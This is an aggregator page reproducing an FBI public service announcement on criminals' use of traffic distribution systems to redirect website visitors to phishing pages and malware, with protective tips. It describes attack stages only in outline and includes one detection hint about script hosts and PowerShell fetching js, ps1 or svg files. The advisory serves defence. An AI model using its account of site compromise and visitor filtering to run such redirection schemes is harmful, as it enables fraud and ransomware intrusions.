惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Forbes - Security
Forbes - Security
GbyAI
GbyAI
WordPress大学
WordPress大学
小众软件
小众软件
Y
Y Combinator Blog
The GitHub Blog
The GitHub Blog
S
SegmentFault 最新的问题
A
About on SuperTechFans
月光博客
月光博客
F
Fortinet All Blogs
宝玉的分享
宝玉的分享
Microsoft Security Blog
Microsoft Security Blog
大猫的无限游戏
大猫的无限游戏
Hugging Face - Blog
Hugging Face - Blog
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
V
V2EX
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
N
Netflix TechBlog - Medium
Jina AI
Jina AI
博客园 - 聂微东
Schneier on Security
Schneier on Security
云风的 BLOG
云风的 BLOG
博客园 - 司徒正美
N
News | PayPal Newsroom
PCI Perspectives
PCI Perspectives
Last Week in AI
Last Week in AI
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
P
Proofpoint News Feed
Hacker News: Ask HN
Hacker News: Ask HN
B
Blog
aimingoo的专栏
aimingoo的专栏
P
Privacy International News Feed
Martin Fowler
Martin Fowler
罗磊的独立博客
H
Hackread – Cybersecurity News, Data Breaches, AI and More
NISL@THU
NISL@THU
Know Your Adversary
Know Your Adversary
C
Cybersecurity and Infrastructure Security Agency CISA
博客园 - 叶小钗
N
News and Events Feed by Topic
T
The Exploit Database - CXSecurity.com
Stack Overflow Blog
Stack Overflow Blog
S
Security @ Cisco Blogs
D
Darknet – Hacking Tools, Hacker News & Cyber Security
V
Vulnerabilities – Threatpost
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
T
Threatpost
IT之家
IT之家
B
Blog RSS Feed

IC3.gov News

Internet Crime Complaint Center (IC3) Internet Crime Complaint Center (IC3) Internet Crime Complaint Center (IC3) Internet Crime Complaint Center (IC3) Internet Crime Complaint Center (IC3) Internet Crime Complaint Center (IC3) Internet Crime Complaint Center (IC3) Internet Crime Complaint Center (IC3) Internet Crime Complaint Center (IC3)
Internet Crime Complaint Center (IC3)
2026-06-18 · via IC3.gov News

The Federal Bureau of Investigation (FBI) is publishing this Public Service Announcement (PSA) to warn the public of cyber criminal use of traffic distribution systems (TDSs) to gain access to victim networks for ransomware or other financial scams. TDS is a technology used to route internet traffic visitors to different destinations after users visit webpages, click advertisement links, sign up for promotions and discounts, or download an application. Cyber criminals use TDSs to selectively redirect users to compromised or fake login websites that can host phishing1 pages for online financial fraud or prompt users to download software updates containing malware.

How a Malicious Traffic Distribution System Works

  1. Initiation of Redirection Cyber criminals use a variety of methods to drive users to a TDS, including social engineering techniques, such as links included in phishing emails, search engine optimization poisoning2 that promotes fraudulent advertisement links that mimic legitimate ones, or the compromise of legitimate websites through changes to the website code.

    1. Legitimate websites are vulnerable to cyber criminal compromise when using insecure passwords or outdated website themes and plugins. Cyber criminals obtain unauthorized access to websites by brute forcing3 weak administrative passwords or leveraging exploits for outdated website plugins. After obtaining administrative access to legitimate websites, cyber criminals edit the website’s code, which redirects website visitors to a malicious TDS.
  2. Redirection Bypasses Firewall4 Cyber criminals often use TDS to bypass traditional firewall rules that would otherwise block connections to malicious websites. The TDS uses a complex chain of intermediate nodes to hide the final malicious destination, making it difficult to trace and block.
  3. Filtering Website Visitors Cyber criminals use TDS to analyze potential victims to target by collecting their IP address, operating system, location, device, and browser information. Based on the collected information, a malicious TDS can determine if a payload is effective and filter traffic accordingly. A cyber criminal can use a TDS to identify users in regions they are not targeting, allowing them to avoid detection by displaying safe content to undesired targets, including security researchers.
  4. Cyber Criminal Exploitation of Users Cyber criminals can exploit website visitor devices at the end of the TDS redirection chain by delivering phishing pages, financial scams, and other malware. Cyber criminals sometimes use a TDS to gain access to a victim’s network, often through malware distribution. Access to victim accounts obtained via network access may be sold for a fee to other cyber criminals, including ransomware groups.

Tips to Protect Yourself

The FBI recommends individuals take the following precautions to protect themselves from being targeted by a malicious TDS:

  • Exercise caution when clicking on advertisements Before clicking on an advertisement, check the URL to make sure the site is authentic. A malicious URL may be similar to a legitimate URL or a subdomain of a legitimate domain.
  • Keep Software Updated Regularly update website software plugins and themes to patch known vulnerabilities. Enable automatic updates for minor releases and plugins.
  • Use Security Plugins & Firewalls Install reputable plugins that provide a Web Application Firewall (WAF) to block malicious traffic.
  • Harden Login Security Enforce strong passwords for all users, implement Two-Factor Authentication (2FA), and limit login attempts to prevent brute-force attacks.
  • Avoid Unverified Developers Only install third-party plugins and themes from reputable, verified developers and official repositories.

The FBI recommends businesses take the following precautions to protect themselves from malicious TDS:

  • Change Default File Associations Consider changing the default file associations for js files so users cannot execute malicious js payloads delivered through malicious TDS.
  • Monitor Endpoints Monitor endpoints for suspicious execution of wscript.exe, cscript.exe and PowerShell scripts invoking web requests for suspicious files, specifically js, ps1, or svg files.
  • User Training and Awareness Combat phishing and social engineering tactics through user training and awareness.
  • Audit and Patch Web Hosting Administration Frequently audit Content Management System (CMS) admin, database, File Transfer Protocol (FTP) and web hosting accounts, use strong, unique passwords. Patch all CMS and third-party components.

Report It

If you believe you have been the victim of an intrusion into your website similar to that described above, in addition to filing police reports with your local police department, file a complaint with the Internet Crime Complaint Center (IC3) at www.ic3.gov, or by contacting your local FBI Field Office.